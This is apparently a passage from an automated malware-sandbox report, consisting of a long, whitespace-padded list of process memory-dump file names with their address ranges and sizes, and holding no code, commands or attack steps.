                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4244-316-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4244-332-0x00000000030C0000-0x000000000325C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4300-381-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4336-303-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4336-305-0x0000000002090000-0x0000000002091000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4452-373-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4452-401-0x00000000068A2000-0x00000000068A3000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4452-393-0x00000000068A0000-0x00000000068A1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4480-372-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4536-198-0x0000000008E10000-0x0000000008E14000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    16KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4536-246-0x00000000071F0000-0x00000000071F1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4536-206-0x0000000008E10000-0x0000000008E14000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    16KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4536-207-0x0000000008E10000-0x0000000008E14000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    16KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4536-204-0x0000000008E10000-0x0000000008E14000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    16KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4536-203-0x0000000008E10000-0x0000000008E14000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    16KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4536-202-0x0000000008E10000-0x0000000008E14000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    16KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4536-200-0x0000000008E10000-0x0000000008E14000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    16KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4536-196-0x0000000008C80000-0x0000000008C95000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    84KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4536-244-0x00000000022A0000-0x00000000022A1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4536-205-0x0000000008E10000-0x0000000008E14000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    16KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4536-156-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4536-192-0x0000000007200000-0x000000000720F000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    60KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4536-170-0x0000000006AF0000-0x0000000006DD0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2.9MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4536-171-0x00000000005C0000-0x000000000066E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    696KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4588-427-0x0000000004BD0000-0x0000000004BD1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4692-385-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    100KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4692-389-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    100KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4692-362-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4692-379-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    100KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4692-383-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    100KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4720-142-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4780-425-0x0000000004AC0000-0x0000000004B36000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    472KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4880-145-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4880-424-0x0000000005570000-0x0000000005571000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4916-138-0x0000000000400000-0x000000000044C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    304KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4916-139-0x0000000000414F3A-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4916-153-0x0000000000400000-0x000000000044C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    304KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4916-141-0x0000000000400000-0x000000000044C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    304KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4936-378-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4968-281-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4968-312-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4968-288-0x0000000004440000-0x0000000004441000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/4980-392-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5024-165-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5024-173-0x0000000000580000-0x000000000062E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    696KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5040-306-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    120KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5040-307-0x000000000041852A-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5056-304-0x0000000000400000-0x000000000047C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    496KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5140-466-0x00000000053E0000-0x00000000059E6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    6.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5152-468-0x00000000057F0000-0x0000000005DF6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    6.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5232-437-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    80KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/5288-438-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4KB